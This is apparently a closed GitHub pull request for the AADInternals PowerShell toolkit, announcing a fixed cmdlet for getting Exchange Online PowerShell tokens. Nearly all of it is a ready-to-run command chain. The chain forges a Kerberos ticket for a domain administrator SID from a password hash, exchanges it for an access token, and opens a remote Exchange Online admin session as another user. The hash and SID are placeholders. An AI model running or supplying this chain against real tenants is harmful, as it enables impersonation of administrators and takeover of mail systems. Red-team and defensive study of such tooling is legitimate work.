Closed kalimer0x00 closed 2 years ago
Exposed Get-AADIntAccessTokenForEXOPS cmdlet and fixed it.
Get-AADIntAccessTokenForEXOPS
Properly working with forged Kerberos tickets :
Import-Module AADInternals $kt=New-AADIntKerberosTicket -SidString "S-1-5-21-...-11111-500" -Hash "11111111111111111111111111" $at = Get-AADIntAccessTokenForEXOPS -KerberosTicket $KerberosTicket -Domain $Domain $token = ConvertTo-SecureString "Bearer $at" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("adm@contoso.com", $token) $ps = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri "https://ps.outlook.com/powershell-liveid?BasicAuthToOAuthConversion=true" -Credential $cred -Authentication Basic -AllowRedirection Import-PSSession $ps -AllowClobber
Exposed
Get-AADIntAccessTokenForEXOPScmdlet and fixed it.Properly working with forged Kerberos tickets :